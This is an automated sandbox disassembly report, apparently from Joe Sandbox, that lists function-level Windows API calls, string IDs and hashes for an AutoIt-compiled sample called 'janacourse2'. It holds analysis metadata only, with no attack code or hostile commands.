                                                                                                            • API ID: IconLoad
                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                            • API String ID: 2457776203-404129466
                                                                                                            • Opcode ID: a673924f3ced525eb902be03f14d9d13dc3facfe3b9c71889165906184ef5db5
                                                                                                            • Instruction ID: d4a6c20b188f77d73c09d7fc629b4f3c1c792c19f9c79596279fddf0aee7c38e
                                                                                                            • Opcode Fuzzy Hash: a673924f3ced525eb902be03f14d9d13dc3facfe3b9c71889165906184ef5db5
                                                                                                            • Instruction Fuzzy Hash: CB110B316C9707BBB7015A589EC3C9E77DDEF05360B10006FF580AA286E77DE9005268
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 952045576-0
                                                                                                            • Opcode ID: 7124936fba6156f1ffec1790a00116bcea5e754886dc97b52a8478161e7057d0
                                                                                                            • Instruction ID: b2c3b9482756ec7381cbd1213057c9cff8c5c0a63e0c9a90d23de417065f6896
                                                                                                            • Opcode Fuzzy Hash: 7124936fba6156f1ffec1790a00116bcea5e754886dc97b52a8478161e7057d0
                                                                                                            • Instruction Fuzzy Hash: 7E418365C1011876CB11EBB4CC8A9CFB7A9AF45710F548467FA14E3222FB38E255C7E6
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 00FCF953
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 0100F3D1
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 0100F454
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ShowWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1268545403-0
                                                                                                            • Opcode ID: c215e7a7c8265a730b5b29c30d29219e59a735144fd6cc9231184fe490b46c49
                                                                                                            • Instruction ID: fedf05df4ca5fb9bf36e11a06356e46dbf387706d8f88263680bf3f5991a1acc
                                                                                                            • Opcode Fuzzy Hash: c215e7a7c8265a730b5b29c30d29219e59a735144fd6cc9231184fe490b46c49
                                                                                                            • Instruction Fuzzy Hash: 30412E31918642BBEF798B2C8F89F69FF936B46320F04842DE5C756990C637A488E711
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 01042D1B
                                                                                                            • GetDC.USER32(00000000), ref: 01042D23
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01042D2E
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 01042D3A
                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01042D76
                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01042D87
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01045A65,?,?,000000FF,00000000,?,000000FF,?), ref: 01042DC2
                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01042DE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3864802216-0
                                                                                                            • Opcode ID: 11856e55cd5794d1c4d9a6cbcd148220496f58d50b257cd097ab4ca94383dc52
                                                                                                            • Instruction ID: b5e4bcc115bf929516129021f056c3b710f019ffa7ccbaeb7275de1b9358c96d
                                                                                                            • Opcode Fuzzy Hash: 11856e55cd5794d1c4d9a6cbcd148220496f58d50b257cd097ab4ca94383dc52
                                                                                                            • Instruction Fuzzy Hash: 0B31A2B62026147FFB214F54DD89FEB3FADEF09711F044065FE889A191C6759840C7A0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: b6cb62ee0745b40035f88b2060a8d4b56a6adc6619584d1c6c5bad3576f9edf0
                                                                                                            • Instruction ID: 7e35713f8b23e8d8f33cf938b2dc210dd3a0cedd4f43bb26f09d7cac159206ad
                                                                                                            • Opcode Fuzzy Hash: b6cb62ee0745b40035f88b2060a8d4b56a6adc6619584d1c6c5bad3576f9edf0
                                                                                                            • Instruction Fuzzy Hash: E921C9A174020ABBE21465296EC2FFE339DBF97284F080425FD849F646F76CED1085E5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                            • API String ID: 0-572801152
                                                                                                            • Opcode ID: d56c7b182cc52010b6f1e0e98048a8a651736135fc937d585f541672330a16a0
                                                                                                            • Instruction ID: 092b4769224ef4be8dccec49b0e2acec2e3a9016cf203a267795e5f110aa7129
                                                                                                            • Opcode Fuzzy Hash: d56c7b182cc52010b6f1e0e98048a8a651736135fc937d585f541672330a16a0
                                                                                                            • Instruction Fuzzy Hash: D3D18375A0020A9FDF10CF98CC84BAEB7F9BF88314F148469F995AB291E771D945CB90
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 00FF15CE
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FF1651
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FF16E4
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FF16FB
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FF1777
                                                                                                            • __freea.LIBCMT ref: 00FF17A2
                                                                                                            • __freea.LIBCMT ref: 00FF17AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829977744-0
                                                                                                            • Opcode ID: a1f016196e4515349f120fdc18f92b2ddded09100835251eeac01770553e4286
                                                                                                            • Instruction ID: 7c0f7986c114d0d166cd3bb4d208194c55ca1c80e7e0ff6e021d7e32f54be750
                                                                                                            • Opcode Fuzzy Hash: a1f016196e4515349f120fdc18f92b2ddded09100835251eeac01770553e4286
                                                                                                            • Instruction Fuzzy Hash: 6F91B172E0021EDADB209E75CD81AFE7BB5BF49320F1C0659EA05E7160DB25DD44EBA0
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit
                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                            • API String ID: 2610073882-625585964
                                                                                                            • Opcode ID: 60baadb88a37d2374b24c81d795597afdb991d6dd6b12a60deec5789f17bbdf8
                                                                                                            • Instruction ID: 5a238775f61989ea5ccb6a98784eda8e48c0122c0aec045c85f26808fe50a202
                                                                                                            • Opcode Fuzzy Hash: 60baadb88a37d2374b24c81d795597afdb991d6dd6b12a60deec5789f17bbdf8
                                                                                                            • Instruction Fuzzy Hash: 52916B71A00219ABDF25CFA9C888FAEBBB8FF85710F108559F545EF281D7709945CBA0
                                                                                                            APIs
                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0102125C
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021284
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 010212A8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010212D8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0102135F
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010213C4
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 01021430
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2550207440-0
                                                                                                            • Opcode ID: c24517c8da48a74713963c35173994196b302552e1fc4a4a0e78c8ecd65b5fa1
                                                                                                            • Instruction ID: e8d5e5bd11d7040642a18cf0201162fff677dc2870bcf695898292b8a687705e
                                                                                                            • Opcode Fuzzy Hash: c24517c8da48a74713963c35173994196b302552e1fc4a4a0e78c8ecd65b5fa1
                                                                                                            • Instruction Fuzzy Hash: 7C9107B5900229AFEB10DF98C884BFEB7B5FF45314F104069FA80E7291DB79A945CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225163088-0
                                                                                                            • Opcode ID: 9969972717cb98195d0667bd97abb715e5bab3be6ecc1342408cc292c45ac4b3
                                                                                                            • Instruction ID: ee54861d7cf8b877c586b4bbddd3d9442919de9988b375ea6e7bb010dc2d50ae
                                                                                                            • Opcode Fuzzy Hash: 9969972717cb98195d0667bd97abb715e5bab3be6ecc1342408cc292c45ac4b3
                                                                                                            • Instruction Fuzzy Hash: B1915771D0420AAFDB11CFA9CD89EEEBBB8FF49320F148449E551B7291D378A941DB60
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 0103396B
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 01033A7A
                                                                                                            • _wcslen.LIBCMT ref: 01033A8A
                                                                                                            • VariantClear.OLEAUT32(?), ref: 01033C1F
                                                                                                              • Part of subcall function 01020CDF: VariantInit.OLEAUT32(00000000), ref: 01020D1F
                                                                                                              • Part of subcall function 01020CDF: VariantCopy.OLEAUT32(?,?), ref: 01020D28
                                                                                                              • Part of subcall function 01020CDF: VariantClear.OLEAUT32(?), ref: 01020D34
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                            • Opcode ID: 3007ef5159343f879177147857a8239127461156ddd6a7c8409525efada37fd8
                                                                                                            • Instruction ID: 4a1d3f838b1aab320dfcb891dc8385674e9edf1bb3b1cb27df405433bf3754a5
                                                                                                            • Opcode Fuzzy Hash: 3007ef5159343f879177147857a8239127461156ddd6a7c8409525efada37fd8
                                                                                                            • Instruction Fuzzy Hash: D0915974A083059FC714DF29C58196ABBE8FFC9314F04886DF9899B351DB35E905CB92
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?,?,0101035E), ref: 0101002B
                                                                                                              • Part of subcall function 0101000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010046
                                                                                                              • Part of subcall function 0101000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010054
                                                                                                              • Part of subcall function 0101000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?), ref: 01010064
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 01034C51
                                                                                                            • _wcslen.LIBCMT ref: 01034D59
                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 01034DCF
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 01034DDA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                            • String ID: NULL Pointer assignment
                                                                                                            • API String ID: 614568839-2785691316
                                                                                                            • Opcode ID: 3417fd956037cd0b90015fbb3745fe200a76f032c4c4a14390d2441d4c7a91f1
                                                                                                            • Instruction ID: d5fd66cc1c08143291a63e6161c1aa7adec4632e16457e3093f494720b0cd619
                                                                                                            • Opcode Fuzzy Hash: 3417fd956037cd0b90015fbb3745fe200a76f032c4c4a14390d2441d4c7a91f1
                                                                                                            • Instruction Fuzzy Hash: 44911771D0021DAFDF15DFA5CC90AEEBBB9BF48310F10816AE955AB241DB749A44CFA0
                                                                                                            APIs
                                                                                                            • GetMenu.USER32(?), ref: 01042183
                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 010421B5
                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010421DD
                                                                                                            • _wcslen.LIBCMT ref: 01042213
                                                                                                            • GetMenuItemID.USER32(?,?), ref: 0104224D
                                                                                                            • GetSubMenu.USER32(?,?), ref: 0104225B
                                                                                                              • Part of subcall function 01013A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013A57
                                                                                                              • Part of subcall function 01013A3D: GetCurrentThreadId.KERNEL32 ref: 01013A5E
                                                                                                              • Part of subcall function 01013A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010125B3), ref: 01013A65
                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010422E3
                                                                                                              • Part of subcall function 0101E97B: Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4196846111-0
                                                                                                            • Opcode ID: c00cf0473aba5d5f696725a90bb39f4880590e1929c22708e3be73eea5ba765a
                                                                                                            • Instruction ID: dc5f6c3ad76a1bd948e42fc6426f2391271c78437f73c9bbed628964f8444e65
                                                                                                            • Opcode Fuzzy Hash: c00cf0473aba5d5f696725a90bb39f4880590e1929c22708e3be73eea5ba765a
                                                                                                            • Instruction Fuzzy Hash: 8F7192B5A00205AFCB10DF69D981AAEBBF1EF48310F1484A9F956EB345D734A9418F90
                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 0101AEF9
                                                                                                            • GetKeyboardState.USER32(?), ref: 0101AF0E
                                                                                                            • SetKeyboardState.USER32(?), ref: 0101AF6F
                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0101AF9D
                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0101AFBC
                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0101AFFD
                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0101B020
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                            • String ID:
                                                                                                            • API String ID: 87235514-0
                                                                                                            • Opcode ID: a525477714e44b0d051c2ef0174336db3c7e83cc401f609a255ead36e329d7ce
                                                                                                            • Instruction ID: d3e321d5ad8f2c3e79ff8acbb2a54f235b92e532d6a2875c9f8c06dfb0bec25e
                                                                                                            • Opcode Fuzzy Hash: a525477714e44b0d051c2ef0174336db3c7e83cc401f609a255ead36e329d7ce
                                                                                                            • Instruction Fuzzy Hash: 6151D1A0A057D57DFB3782788845BBABEE95B06304F0885CDF2D9468C7C39DA8C8D760
                                                                                                            APIs
                                                                                                            • GetParent.USER32(00000000), ref: 0101AD19
                                                                                                            • GetKeyboardState.USER32(?), ref: 0101AD2E
                                                                                                            • SetKeyboardState.USER32(?), ref: 0101AD8F
                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0101ADBB
                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0101ADD8
                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0101AE17
                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0101AE38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
